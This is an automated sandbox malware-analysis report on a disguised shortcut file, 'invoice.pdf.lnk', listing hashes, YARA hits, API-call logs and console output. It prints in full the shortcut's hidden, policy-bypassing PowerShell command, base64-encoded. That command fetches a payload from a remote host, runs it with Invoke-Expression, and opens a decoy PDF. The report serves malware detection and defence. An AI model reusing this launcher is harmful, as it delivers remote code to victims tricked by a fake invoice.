Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 18, 2023, 6:14 p.m.	July 18, 2023, 6:16 p.m.

Size	3.8KB
Type	MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=13, ctime=Mon Jul 17 14:56:36 2023, mtime=Mon Jul 17 14:56:36 2023, atime=Mon Jul 17 14:56:36 2023, length=0, window=hidenormalshowminimized
MD5	`e2ef58cea3134177185a50584111495d`
SHA256	`b23f6cbfb46a62f1a7d95a153e2652c142b7c3e714a2215423948f4186b93f49`
CRC32	`6D90A396`
ssdeep	`96:8TzVfyPDTj8FJURZC9hWmkp49vVdPJvS37kkURkp4gIqmxKwJqmxKwRPpcM:8T5fyPDTj2JQZC9Amkp49dd5S37kkURT`
Yara	Antivirus - Contains references to security software Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "fGvsMtqWnxMC" C:\Users\test22\AppData\Local\Temp\invoice.pdf.lnk
3052
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -w hidden -exec bypass -encodedcommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AAoACgAjACQAZABhAHQAYQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGUAbgB2ADoAOgB1AHMAZQByAGQAbgBzAGQAbwBtAGEAaQBuACkAKQAKACMAJABkAGEAdABhACAAPQAgACQAYwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMAAwAC4AMgAwADQALwBhAHAAcAAvAGcAZQB0AC8AcwB0AGEAdAB1AHMAPwBkAD0AIgAgACsAIAAkAGQAYQB0AGEAKQAKACMAaQBmACAAKAAkAGQAYQB0AGEAIAAtAG4AZQAgACcAMgAwADAAJwApACAAewAgAGUAeABpAHQAIAB9AAoACgAkAGQAYQB0AGEAIAA9ACAAJABjAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwADAALgAyADAANAAvAGEAcABwAC8AYQB1AHQAaAAiACkACgAkAGQAYQB0AGEAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAYQB0AGEAKQApAAoACgAkAGMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMAAwAC4AMgAwADQALwBhAHAAcAAvAGkAbgB2AG8AaQBjAGUALgBwAGQAZgAiACwAIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAaQBuAHYAbwBpAGMAZQAuAHAAZABmACIAKQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAHcAYQBpAHQAIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAaQBuAHYAbwBpAGMAZQAuAHAAZABmACIACgAKAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAZABhAHQAYQAKAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACIAJABlAG4AdgA6AHQAZQBtAHAAXABpAG4AdgBvAGkAYwBlAC4AcABkAGYAIgAKAA==
  1376

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 18, 2023, 6:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 6:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 6:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 6:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 6:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 6:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 18, 2023, 6:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 6:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 6:14 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 18, 2023, 6:14 p.m.			0	0

Command line console output was observed (37 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: Exception calling "DownloadString" with "1" argument(s): "Unable to connect to console_handle: 0x00000023	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: the remote server" console_handle: 0x0000002f	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: At line:7 char:31 console_handle: 0x0000003b	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: + $data = $client.DownloadString <<<< ("http://192.168.100.204/app/auth") console_handle: 0x00000047	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x00000053	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x0000005f	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "Unable to connect to th console_handle: 0x0000007f	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: e remote server" console_handle: 0x0000008b	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: At line:10 char:21 console_handle: 0x00000097	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: + $client.DownloadFile <<<< ("http://192.168.100.204/app/invoice.pdf", "$env:te console_handle: 0x000000a3	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: mp\invoice.pdf") console_handle: 0x000000af	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000bb	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000c7	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: Start-Process : This command cannot be executed due to the error: The system ca console_handle: 0x00000023	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: nnot find the file specified. console_handle: 0x0000002f	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: At line:11 char:14 console_handle: 0x0000003b	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: + Start-Process <<<< -wait "$env:temp\invoice.pdf" console_handle: 0x00000047	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp console_handle: 0x00000053	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: erationException console_handle: 0x0000005f	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C console_handle: 0x0000006b	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: ommands.StartProcessCommand console_handle: 0x00000077	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: Invoke-Expression : Cannot bind argument to parameter 'Command' because it is a console_handle: 0x00000097	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: n empty string. console_handle: 0x000000a3	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: At line:13 char:18 console_handle: 0x000000af	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: + Invoke-Expression <<<< $data console_handle: 0x000000bb	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: + CategoryInfo : InvalidData: (:) [Invoke-Expression], ParameterB console_handle: 0x000000c7	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: indingValidationException console_handle: 0x000000d3	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: + FullyQualifiedErrorId : ParameterArgumentValidationErrorEmptyStringNotAl console_handle: 0x000000df	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: lowed,Microsoft.PowerShell.Commands.InvokeExpressionCommand console_handle: 0x000000eb	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: Remove-Item : Cannot find path 'C:\Users\test22\AppData\Local\Temp\invoice.pdf' console_handle: 0x0000010b	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: because it does not exist. console_handle: 0x00000117	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: At line:14 char:12 console_handle: 0x00000123	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: + Remove-Item <<<< -path "$env:temp\invoice.pdf" console_handle: 0x0000012f	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: + CategoryInfo : ObjectNotFound: (C:\Users\test22...emp\invoice.p console_handle: 0x0000013b	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: df:String) [Remove-Item], ItemNotFoundException console_handle: 0x00000147	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.Remov console_handle: 0x00000153	1	1
WriteConsoleW July 18, 2023, 6:15 p.m.	buffer: eItemCommand console_handle: 0x0000015f	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 57 events)

Time & API	Arguments	Status	Return
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061dfb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e438 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e438 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e438 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e5f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e5f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e5f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e3f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e5f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e5f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e5f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e5f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e5f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e5f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e5f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e238 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e238 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e238 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e238 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e238 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e238 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e238 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e238 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e238 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e238 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e238 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e238 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e238 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061e238 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c6bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c6bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c6c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c6c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c6c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c6c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c6c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c6c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c6c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c6c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c6c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c6c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 18, 2023, 6:14 p.m.		1	1	0

Powershell script has download & invoke calls (1 event)

Allocates read-write-execute memory (usually to unpack itself) (50 out of 167 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02890000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02950000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73921000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73922000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02702000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02951000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02952000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02703000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02704000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02737000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02722000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02735000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02705000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02706000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02723000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02724000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02725000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02726000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02727000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02728000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02729000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
